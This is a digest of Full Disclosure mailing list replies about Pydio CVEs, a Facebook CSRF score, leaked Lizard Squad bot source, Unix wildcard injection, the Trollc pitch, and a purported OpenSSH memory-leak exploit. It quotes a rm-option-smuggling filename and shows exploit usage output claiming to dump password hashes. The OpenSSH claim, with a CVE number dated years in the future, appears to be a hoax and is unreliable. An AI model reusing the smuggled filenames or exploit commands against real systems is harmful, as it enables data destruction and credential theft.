Re: [FD] pydio vulnerabilities

https://github.com/pydio/pydio-core/commits/develop
https://github.com/pydio/pydio-core/commit/2049254e7a215491019d2646a274a8fb1cf29e3b

2015-05-07 1:32 GMT+03:00 Just A Fake robottomonitorbugt...@gmail.com:
> Does anyone have any info on the two pydio vulnerabilities announced today? They have been given CVE-2015-3431 and CVE-2015-3432, but a search on mitre just says those are reserved. There is no information or explanation about what the issues are.
>
> https://pyd.io/pydio-core-6-0-7/?utm_source=Pydio+Releasesutm_campaign=85ba0d8870-Pydio_6_0_7_Community
>
> Thanks for any info anyone has.
>
> Robot

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Re: [FD] Facebook Bug Bounty #23 - Session ID CSRF Vulnerability

Even though deleting everything is kind of a big deal, it still does not get you anywhere near that CVSS score. Here are my very generous calculator inputs: http://puu.sh/fQVB5/76c526ed5d.png
Re: [FD] Lizard Stresser rekt

ayy lmao

//Julius Kivimäki, leader of Lizard Squad

2015-01-12 10:29 GMT+00:00 Robert Cavanaugh sleuth1...@gmail.com:
> Hi FD,
>
> I'm sure you're all sick to death of hearing about Lizard Squad and the skid marks they're leaving all over the place, so we'll make this brief: Lizard Squad has been rekt and the source code for their bots is now available for your viewing pleasure.
>
> https://github.com/pop-pop-ret/lizkebab
>
> 0wned by: Chippy1337, @packetprophet
>
> If you lulz'd, send BTC to 129UQoB3JvZg3iDERYZiXeHPkwT1iJF8u4
> https://blockchain.info/address/129UQoB3JvZg3iDERYZiXeHPkwT1iJF8u4
Re: [FD] Back To The Future: Unix Wildcards Gone Wild

Um, this is well-documented behavior that's been around for decades. * expands to all files in the dir as arguments to whatever; if the filename is "--no-preserve-root -rf ..", why shouldn't that be returned?

2014-06-26 11:40 GMT+03:00 defensecode defensec...@defensecode.com:
> Hi,
>
> We wanted to inform all major *nix distributions via our responsible disclosure policy about this problem before posting it, because it is highly likely that this problem could lead to local root access on many distributions. But, since part of the research contained in the document was mentioned in some blog entries, we are forced to release it in full.
>
> Download URL: http://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt
>
> Regards,
> Leon Juranic
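As an added illustration of the expansion the reply above describes (not code from either post), this POSIX sh demo uses a stand-in option parser to show how an unquoted * hands option-looking filenames to a command as options, how "--" or "./*" keeps them as operands, and a quick check that lists such names. The directory and filenames are constructed by the script itself.

```shell
#!/bin/sh
# Added example, not from the list thread: shows what a bare '*' expands to
# when a directory holds option-looking names, and two ways a script avoids
# having them parsed as options. All filenames below are constructed.

# Stand-in for a command with getopt-style parsing: arguments starting with
# '-' are options until a literal '--' is seen; everything else is an operand.
# Prints "<option count> <operand count>".
parse_args() {
    opts=0; operands=0
    while [ $# -gt 0 ]; do
        case "$1" in
            --) shift; operands=$((operands + $#)); break ;;
            -*) opts=$((opts + 1)) ;;
            *)  operands=$((operands + 1)) ;;
        esac
        shift
    done
    echo "$opts $operands"
}

# Defender check: list entries directly under $1 whose names begin with '-'.
option_named_files() {
    find "$1" -maxdepth 1 -name '-*' -exec basename {} \;
}

# Runs the three expansions in a scratch directory and prints one line each:
# bare glob, glob after '--', glob with a './' prefix, then the check's count.
wildcard_demo() {
    dir=$(mktemp -d) || return 1
    ( cd "$dir" && touch -- 'report.txt' '--no-preserve-root' '-rf' ) || return 1
    printf 'unsafe %s\n'   "$(cd "$dir" && parse_args *)"     # names become options
    printf 'dashdash %s\n' "$(cd "$dir" && parse_args -- *)"  # '--' ends option parsing
    printf 'dotslash %s\n' "$(cd "$dir" && parse_args ./*)"   # './x' never starts with '-'
    printf 'flagged %s\n'  "$(option_named_files "$dir" | wc -l | tr -d ' ')"
    rm -rf -- "$dir"
}

wildcard_demo
```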
Re: [FD] What do you think of Trollc?

If you actually know weev, then you know that he isn't capable of running a business.

2014-05-27 21:49 GMT+03:00 Philip Cheong isc...@gmail.com:
> From https://www.startjoin.com/trollc
>
> Right now if you're a software exploit developer and you want to monetize your craft to pay your rent, there's only one consistent way to do so: sell your software exploits. The major customer for these are oppressive governments, chiefly that of the United States. We know what the United States does with software exploits: it uses them to illegally spy on its own citizens, and attack peaceful nations around the world.
>
> I need your help to create a company that will ethically disclose software vulnerabilities to the public. For this I need help getting the filing fees necessary to incorporate a hedge fund. I want to continue bringing issues in companies that put you at risk to light, and short the stocks of those companies when I do so. I will only get paid when large corporations being negligent get punished. This will create a structure by which security researchers including myself will still make a living, only now by disclosing problems instead of selling them in secret to criminal governments.
>
> What say you? Is this brilliant? Or stupid? Awesome? But never going to work?
Re: [FD] OpenSSH Vulnerabilities

PAM, how does it work?

2014-05-07 1:08 GMT+03:00 de...@roosoft.ltd.uk:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> http://pastebin.com/raw.?i=gjkivAf3
>
> -- CUT --
> #exploit #openssh
>
> [ASCII-art banner: OpenSSH sshd - memory leak, 5.1-6.X (priv8, still unfixed)]
>
> u mad Heartbleed ? ...
>
> Release date: 04/30/2014
> Product: OpenSSH
> Vendor: http://www.openssh.com/
> CVE candidate number: CVE-2018- (maybe 2020+...)
>
> Two years ago we found a memory disclosure vulnerability in the OpenSSH server which allows remotely extracting data from the memory zones of the sshd server's child processes. This vulnerability exploits a bad check in the network layer of the sshd server, which we trigger to retrieve all child processes' memory sections, thereby allowing us to dump:
> - system users hashes
> - keys
> - many random things ;)
>
> This exploit was tested on:
> - SSH-2.0-OpenSSH_5.1p1 Debian-5
> - SSH-2.0-OpenSSH_5.1p1 DragonFly-20080927
> - SSH-2.0-OpenSSH_5.2p1 FreeBSD-20090522
> - SSH-2.0-OpenSSH_5.5p1 Debian-6+squeeze3
> - SSH-2.0-OpenSSH_5.8p1 Debian-7ubuntu1
> - SSH-2.0-OpenSSH_6.1p1 Debian-4
> - SSH-2.0-OpenSSH_6.2p2-hpn13v14 FreeBSD-openssh-portable-6.2.p2_3,1
> - SSH-2.0-OpenSSH_6.4p1 Debian-1~bpo70+1
> - SSH-2.0-OpenSSH_6.4p1 FreeBSD-openssh-portable-6.4.p1,1
> - SSH-2.0-OpenSSH_6.5p1 CentOS RHEL
> - SSH-2.0-OpenSSH_6.6p1 Ubuntu-2ubuntu1
> - ... many more
>
> Enough bullshit, POC TIME !
>
> $ ls -lh
> total 227K
> drwxr-xr-x  2 vjn  vjn  4.0K Apr 30 01:53 .
> drwxrwxrwt 32 root root 4.0K Apr 30 01:53 ..
> -rw-r--r--  1 vjn  vjn  236K Apr 30 01:53 icanhaze.c
> $ sha1sum icanhaze.c
> d7faeb46f10ea6b7058a116043c1f0ce7a158c7f  icanhaze.c
> $ gcc icanhaze.c -O3 -lcrypto -lopenbsd-compat -lssl -lssh -lpam -o icanhaze
> $ ./icanhaze
> +--+
> | OpenSSH 5.1-6.X - infoleak |
> | don't evar fuckin release it |
> +--+
> Usage: ./icanhaze [OPTIONS]
>   -h, --host host           Hostname or IP
>   -p, --port port           Port number (default: 22)
>   -d, --dump dump_file      Dump output file
>   -H, --hashes hashes_file  User hashes dump file (john)
>   -v, --verbose             Verbose mode
>   -D, --debug               Debug mode
> Supported architectures: x86, x86_64, armv7
> Supported operating systems: Linux, *BSD
> $ ./icanhaze -v -h 192.168.10.5 -p 22 -d output.dump -H
> +--+
> | OpenSSH 5.1-6.X - infoleak |
> | don't evar fuckin release it |
> +--+
> [I] - connecting to target 192.168.10.5 on port 22
> [I] - sshd banner: SSH-2.0-OpenSSH_6.4p1 Debian-1~bpo70+1
> [I] - let magic happenz
> [W] - bad luck... retrying
> [W] - bad luck... retrying
> [W] - bad luck... retrying
> [W] - bad luck... retrying
> [W] - bad luck... retrying
> [W] - bad luck... retrying
> [I] - STAGE_1: OK
> [I] - mode: x86_64
> [I] - pointerz fuckery
> [I] - STAGE_2: OK
> [I] - fingerprinted child sectionz table